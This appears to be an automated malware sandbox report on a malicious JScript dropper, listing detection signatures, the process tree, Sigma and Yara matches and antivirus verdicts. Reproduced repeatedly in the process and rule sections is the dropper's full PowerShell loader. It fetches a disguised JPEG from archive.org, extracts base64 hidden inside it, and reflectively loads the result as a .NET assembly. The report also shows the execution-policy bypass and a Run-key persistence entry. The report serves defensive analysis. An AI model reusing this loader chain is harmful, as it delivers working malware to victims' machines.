Windows Analysis Report
15514541_Doc_Sub(C-A0893)10-08-2024.js

Overview

General Information

Sample name: 15514541_Doc_Sub(C-A0893)10-08-2024.js
Analysis ID: 1491471
MD5: 7877c30c23e5a9a156eec6305499f212
SHA1: e50c8c551b7f240ad228cbabf5f65f6f05e02059
SHA256: 8ddfd33e477594cd5387654a8b6435e906c692c064ddc55422bb4d2fee08723b
Tags: js

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

(classification chart; categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean / suspicious / malicious)
  • System is w10x64
  • wscript.exe (PID: 6752 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5548 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 5752 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 5752 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings listed below)
    • 0x44cb3:$b2: ::FromBase64String(
    • 0xf5ae3:$b2: ::FromBase64String(
    • 0xf6249:$b2: ::FromBase64String(
    • 0xf7186:$b2: ::FromBase64String(
    • 0xf75ec:$b2: ::FromBase64String(
    • 0xf7b7a:$b2: ::FromBase64String(
    • 0xf7f97:$b2: ::FromBase64String(
    • 0x44b27:$b3: ::UTF8.GetString(
    • 0xf5957:$b3: ::UTF8.GetString(
    • 0xf60bd:$b3: ::UTF8.GetString(
    • 0xf6ffa:$b3: ::UTF8.GetString(
    • 0xf7460:$b3: ::UTF8.GetString(
    • 0xf79ee:$b3: ::UTF8.GetString(
    • 0xf7e0b:$b3: ::UTF8.GetString(
    • 0x3b8e4:$s1: -join
    • 0xfb62d:$s1: -join
    • 0x8868a:$s3: reverse
    • 0x8f2c9:$s3: reverse
    • 0x91310:$s3: reverse
    • 0x9c33f:$s3: reverse
    • 0xa158c:$s3: reverse
Process Memory Space: powershell.exe PID: 6800 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 6800 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings listed below)
      • 0x3c760:$b2: ::FromBase64String(
      • 0x3cd03:$b2: ::FromBase64String(
      • 0xf3843:$b2: ::FromBase64String(
      • 0xf3c55:$b2: ::FromBase64String(
      • 0xf4d0e:$b2: ::FromBase64String(
      • 0x1b9c6a:$b2: ::FromBase64String(
      • 0x6d0171:$b2: ::FromBase64String(
      • 0x83c880:$b2: ::FromBase64String(
      • 0x83cc1f:$b2: ::FromBase64String(
      • 0x83d95f:$b2: ::FromBase64String(
      • 0x842413:$b2: ::FromBase64String(
      • 0x842825:$b2: ::FromBase64String(
      • 0x846a08:$b2: ::FromBase64String(
      • 0x846e22:$b2: ::FromBase64String(
      • 0x84743e:$b2: ::FromBase64String(
      • 0x847a12:$b2: ::FromBase64String(
      • 0x847dcb:$b2: ::FromBase64String(
      • 0x85d666:$b2: ::FromBase64String(
      • 0x85da78:$b2: ::FromBase64String(
      • 0x8cfa22:$b2: ::FromBase64String(
      • 0x8d7d24:$b2: ::FromBase64String(
Source | Rule | Description | Author | Strings
amsi64_6800.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

        System Summary

        Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]'
        Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine: (same as Command), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]'
        Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]'
        Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", ProcessId: 6752, ProcessName: wscript.exe
        Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]'
        Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\ProgramData\neuromo.js, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
        Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6800, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js", ProcessId: 5548, ProcessName: cmd.exe
        Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine: (same as Command), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]'
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = 
[System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?
        Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", ProcessId: 6752, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? 
?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?

        Data Obfuscation

        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = 
$loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?
        Timestamp: 2024-08-12T11:37:07.077733+0200
        SID: 2049038
        Severity: 1
        Source Port: 443
        Destination Port: 49704
        Protocol: TCP
        Classtype: A Network Trojan was detected


        AV Detection

        Source: https://maso.ge/wp-admin/sky.txt, Avira URL Cloud: Label: malware
        Source: http://maso.ge, Avira URL Cloud: Label: malware
        Source: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg, Avira URL Cloud: Label: malware
        Source: https://maso.ge, Avira URL Cloud: Label: malware
        Source: maso.ge, Virustotal: Detection: 13%
        Source: https://maso.ge/wp-admin/sky.txt, Virustotal: Detection: 11%
        Source: https://maso.ge, Virustotal: Detection: 13%
        Source: http://maso.ge, Virustotal: Detection: 13%
        Source: 15514541_Doc_Sub(C-A0893)10-08-2024.js, Virustotal: Detection: 12%
        Source: unknown, HTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
